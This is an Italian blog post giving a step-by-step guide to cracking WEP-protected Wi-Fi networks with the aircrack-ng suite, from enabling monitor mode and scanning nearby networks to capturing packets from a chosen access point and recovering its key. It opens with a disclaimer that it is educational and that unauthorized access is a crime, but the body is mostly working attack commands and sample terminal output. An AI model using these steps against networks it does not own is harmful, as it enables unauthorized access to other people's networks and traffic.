Guida rapida al wireless cracking (WEP)

***
Note: La presente guida è pubblicata esclusivamente a scopo didattico. Collegarsi a reti wireless senza l’autorizzazione del proprietario costituisce reato punibile penalmente. Il WEP è stato dichiarato non sicuro da anni, la sua diffusione attuale è molto limitata. Se la vostra rete wireless è cifrata utilizzando il WEP dovreste immediatamente proteggervi utilizzando la cifratura WPA o WPA2. Gli output del terminale sono stati in alcuni casi semplificati rimuovendo informazioni non rilevanti allo scopo di migliorare leggibilita’ e comprensione della guida.
***

Guida rapida al wireless cracking (WEP) – Prima parte

Per craccare una rete wireless con cifratura WEP sono sufficienti un pc dotato di scheda di rete Wi-Fi e un programma di nome aircrack-ng (ng sta per New Generation, essendo questa una versione aggiornata e piu’ evoluta di aircrack).

1) Installare aircrack-ng:

sudo apt-get install aircrack-ng

2) Avviare la modalita’ di monitoraggio (monitor mode):
Prima occorre disabilitare la scheda wireless:

sudo airmon-ng stop wlan0

Poi va riavviata in monitor mode:

sudo airmon-ng start wlan0

Nell’esempio il nome della scheda di rete è wlan0. Su un pc dotato di una scheda ethernet piu’ una wireless solitamente il nome è wlan0. Per trovare il nome della scheda di rete digitare da terminale il seguente comando:

ifconfig -a

Ecco l’output:

$ ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:22937 errors:0 dropped:0 overruns:0 frame:0
TX packets:19393 errors:0 dropped:0 overruns:0 carrier:1
collisions:0 txqueuelen:1000
RX bytes:22963442 (22.9 MB)  TX bytes:2411958 (2.4 MB)

wlan0     Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

3) Visualizziamo le reti wireless intorno a noi con il comando:

sudo airodump-ng wlan0

Come si vede ci sono due reti, una con cifratura WPA mentre l’altra usa il WEP. I dati interessanti ai fini di questa guida sono:

* il campo BSSID, che mostra gli indirizzi MAC dei router/ap

* CH che è il canale di trasmissione

* ESSID che è il nome della rete wireless

Individuata la rete da attaccare, possiamo metterci all’opera iniziando a sniffare i pacchetti con:

sudo airodump-ng -c x –bssid xx:xx:xx:xx:xx:xx -w dump wlan0

Inserire al posto delle x i valori corretti di canale (CH) e BSSID.
Una volta sniffato un numero sufficiente di pacchetti, lanciare aircrack-ng sul file .cap generato nella home utente da airodump-ng:

sudo aircrack-ng -b xx:xx:xx:xx:xx:xx dump-01.cap

Ed ecco la chiave in formato HEX.

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...